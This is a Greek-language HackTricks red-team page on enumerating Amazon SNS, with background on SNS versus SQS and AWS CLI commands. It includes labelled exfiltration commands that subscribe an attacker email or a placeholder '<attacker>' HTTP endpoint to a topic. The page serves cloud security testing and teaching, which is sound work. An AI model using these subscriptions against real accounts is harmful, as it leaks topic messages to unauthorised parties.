AWS - SNS Enum

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team του HackTricks AWS)!

Άλλοι τρόποι υποστήριξης του HackTricks:

SNS

Το Amazon Simple Notification Service (Amazon SNS) περιγράφεται ως ένα πλήρως διαχειριζόμενο υπηρεσία μηνυμάτων. Υποστηρίζει τόσο την εφαρμογή-προς-εφαρμογή (A2A) όσο και την εφαρμογή-προς-άνθρωπο (A2P) τύπους επικοινωνίας.

Οι βασικές λειτουργίες για την επικοινωνία A2A περιλαμβάνουν τους μηχανισμούς δημοσίευσης/συνδρομής (pub/sub). Αυτοί οι μηχανισμοί εισάγουν θέματα, τα οποία είναι κρίσιμα για τη δυνατότητα υψηλής ροής, βασισμένης σε πιέσεις, πολλαπλών-προς-πολλαπλούς μηνυμάτων. Αυτή η λειτουργία είναι υψίστης σημασίας σε σενάρια που περιλαμβάνουν κατανεμημένα συστήματα, μικρο-υπηρεσίες και αρχιτεκτονικές serverless που βασίζονται σε συμβάντα. Χρησιμοποιώντας αυτά τα θέματα, τα συστήματα δημιουργών μπορούν να διανέμουν αποτελεσματικά μηνύματα σε ένα ευρύ φάσμα συστημάτων συνδρομητών, διευκολύνοντας ένα πρότυπο μηνυμάτων fanout.

Διαφορά με το SQS

Το SQS είναι μια υπηρεσία βασισμένη σε ουρά που επιτρέπει την επικοινωνία σημείου-προς-σημείο, εξασφαλίζοντας ότι τα μηνύματα επεξεργάζονται από έναν μοναδικό καταναλωτή. Προσφέρει παράδοση τουλάχιστον μία φορά, υποστηρίζει τυπικές και FIFO ουρές, και επιτρέπει τη διατήρηση μηνυμάτων για επανάληψη και καθυστερημένη επεξεργασία. Από την άλλη, το SNS είναι μια υπηρεσία βασισμένη σε δημοσίευση/συνδρομή, επιτρέποντας την ένα-προς-πολλούς επικοινωνία με τη μετάδοση μηνυμάτων σε πολλούς συνδρομητές ταυτόχρονα. Υποστηρίζει διάφορα σημεία συνδρομής όπως email, SMS, λειτουργίες Lambda και HTTP/HTTPS, και παρέχει μηχανισμούς φιλτραρίσματος για στοχευμένη παράδοση μηνυμάτων. Ενώ και οι δύο υπηρεσίες επιτρέπουν την αποσύνδεση μεταξύ στοιχείων σε κατανεμημένα συστήματα, το SQS εστιάζει στην επικοινωνία με ουρές, ενώ το SNS τονίζει τα πρότυπα επικοινωνίας βασισμένα σε συμβάντα και fan-out.

Απαρίθμηση

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Σημειώστε ότι αν το θέμα είναι τύπου FIFO, μόνο συνδρομητές που χρησιμοποιούν το πρωτόκολλο SQS μπορούν να χρησιμοποιηθούν (το HTTP ή το HTTPS δεν μπορούν να χρησιμοποιηθούν).

Επίσης, ακόμα κι αν το --topic-arn περιέχει την περιοχή, βεβαιωθείτε ότι καθορίζετε τη σωστή περιοχή στο --region αλλιώς θα λάβετε ένα σφάλμα που φαίνεται ότι δεν έχετε πρόσβαση, αλλά το πρόβλημα είναι η περιοχή.

Μη εξουσιοδοτημένη Πρόσβαση

AWS - SNS Unauthenticated Enum

Ανόδος Δικαιωμάτων

AWS - SNS Privesc

Μετά την Εκμετάλλευση

AWS - SNS Post Exploitation

Διατήρηση

AWS - SNS Persistence

Αναφορές

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Last updated